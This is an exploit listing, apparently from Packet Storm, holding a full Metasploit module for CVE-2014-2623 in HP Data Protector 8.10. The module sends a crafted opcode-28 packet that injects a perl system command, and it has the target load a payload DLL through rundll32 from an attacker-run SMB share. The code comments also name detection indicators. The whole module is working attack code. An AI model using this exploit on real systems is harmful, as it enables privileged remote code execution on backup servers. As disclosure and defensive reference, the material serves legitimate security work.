
HP Data Protector 8.10 Remote Command Execution

2015-03-05 00:00:00
Christian Ramirez
packetstormsecurity.com

0.522 Medium

EPSS

Percentile

97.6%

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
# Exploit module for CVE-2014-2623 (HP Data Protector 8.10, OmniInet service).
#
# Flow: fingerprint the service on RPORT (check), start an SMB share hosting a
# payload DLL, then send one opcode-28 request asking the target to run
# rundll32.exe against that UNC path (primer / send_pkt).
#
# Defender view: the network indicators are a short TCP/5555 session carrying
# the "28" opcode plus "\perl.exe" / "-esystem(", followed by an outbound SMB
# connection from the backup server to an untrusted host. The host-side
# indicator is rundll32.exe started with a UNC path argument, presumably under
# the Data Protector process tree (not verified here). Mitigation is the vendor
# advisory listed in References; check treats A.08.11 and later as no longer
# "Appears".
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  # Serves the SMB share from which the target fetches the payload DLL.
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # Module metadata and options.
  #
  # Two network legs are involved: the inbound request to the OmniInet service
  # (RPORT, default 5555) and the outbound SMB connection from the target back
  # to the share this module serves. SMB_DELAY bounds how long the second leg
  # is waited for (see exploit).
  def initialize(info={})
    super(update_info(info,
      'Name' => 'HP Data Protector 8.10 Remote Command Execution',
      'Description' => %q{
        This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
        commands can be execute by sending crafted requests with opcode 28 to the OmniInet
        service listening on the TCP/5555 port. Since there is an strict length limitation on
        the command, rundll32.exe is executed, and the payload is provided through a DLL by a
        fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
        Windows 7 SP1.
      },
      'Author' => [
        'Christian Ramirez', # POC
        'Henoch Barrera', # POC
        'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
      ],
      'References' =>
        [
          ['CVE', '2014-2623'],
          ['OSVDB', '109069'],
          ['EDB', '34066'],
          ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload' =>
        {
          'Space' => 2048,
          'DisableNops' => true
        },
      # Privileged: the command is run by the OmniInet service rather than an
      # interactive user (per the description above; exact account not shown).
      'Privileged' => true,
      'Platform' => 'win',
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Targets' =>
        [
          [ 'HP Data Protector 8.10 / Windows', { } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Nov 02 2014'))

    register_options(
      [
        Opt::RPORT(5555),
        # Optional; setup generates a random <letters>.dll name when unset.
        OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
        # Upper bound (seconds) on how long the SMB server stays up waiting for
        # the target to request the DLL; see exploit.
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)

    # FILE_CONTENTS is filled in programmatically by primer, never by the user.
    deregister_options('FILE_CONTENTS')
  end

  # Version check based on the OmniInet banner.
  #
  # @return [Exploit::CheckCode] Unknown when no banner is returned, Safe when
  #   the banner is not an A.08.x release, Appears for A.08.00 - A.08.10, and
  #   Detected for A.08.11 and later (treated as fixed; confirm against the
  #   vendor advisory in References)
  def check
    fingerprint = get_fingerprint

    if fingerprint.nil?
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - HP Data Protector version #{fingerprint}")

    # Only the A.08 line is matched; any other major falls through to Safe, so
    # Safe here means "not 8.x", not "verified patched".
    if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
      minor = $1.to_i # captured minor version, e.g. 10 for A.08.10
    else
      return Exploit::CheckCode::Safe
    end

    if minor < 11
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Detected
  end

  # @return [String] "host:port" of the OmniInet target, used in log lines
  def peer
    "#{rhost}:#{rport}"
  end

  # Banner grab: sends 64 random upper-case letters to the service and reads a
  # single response. The probe itself is observable (unexpected alphabetic
  # data on the OmniInet port).
  #
  # @return [String, nil] the ASCII-decoded banner with its trailing null
  #   removed, or nil when the service sends nothing back
  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1) # -1: presumably "read whatever is available" - verify against Rex
    disconnect

    if resp.nil?
      return nil
    end

    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
  end

  # Builds and sends one opcode-28 request to the OmniInet service.
  #
  # The command is wrapped in `perl.exe -esystem('...')` and the request is
  # length-prefixed on the wire. For detection, the distinguishing content is
  # the "28" opcode followed by "\perl.exe" and "-esystem(" within a single
  # short session on the OmniInet port.
  #
  # @param cmd [String] command line to run; MUTATED in place (gsub!), so the
  #   caller's string is changed and should not be reused
  # @return [void]
  def send_pkt(cmd)
    # Each backslash in the command becomes four backslashes; gsub! modifies
    # the caller's object.
    cmd.gsub!("\\", "\\\\\\\\")

    # Fixed header fields preceding the opcode; their meaning is not
    # documented in this module.
    pkt = "2\x00"
    pkt << "\x01\x01\x01\x01\x01\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x01\x00 "
    pkt << "28\x00" # opcode 28
    pkt << "\\perl.exe\x00 "
    pkt << "-esystem('#{cmd}')\x00"

    connect
    sock.put([pkt.length].pack('N') + pkt) # 4-byte big-endian length prefix
    disconnect
  end

  # Hook run by the SMB Server::Share mixin once the share is available
  # (by that mixin's convention): publishes the payload DLL and asks the
  # target to load it with rundll32.exe from the share's UNC path.
  #
  # Defender view: rundll32.exe with a remote UNC path as its DLL argument is
  # the host-side indicator of this module.
  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")

    print_status("#{peer} - Trying to execute remote DLL...")
    # rundll32's "<dll>,<entry>" syntax; a single random digit serves as the entry.
    sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
    send_pkt(sploit)
  end

  # Chooses the shared file name (user-supplied, or 4-6 random letters plus
  # ".dll") and validates its extension before the SMB server starts.
  #
  # Fails with Failure::BadConfig when FILE_NAME does not end in .dll.
  def setup
    super

    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"

    # NOTE(review): `$` anchors at end of line, so a name containing a newline
    # would pass; `\z` anchors the whole string. Low impact here, as FILE_NAME
    # is operator-supplied.
    unless file_name =~ /\.dll$/
      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
    end
  end

  # Runs the SMB server (super) for at most SMB_DELAY seconds. Hitting the
  # timeout is the normal way the run ends, so Timeout::Error is deliberately
  # swallowed.
  # NOTE(review): Timeout.timeout interrupts super wherever it happens to be;
  # presumably the mixin's own cleanup copes with that - not verified here.
  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end
`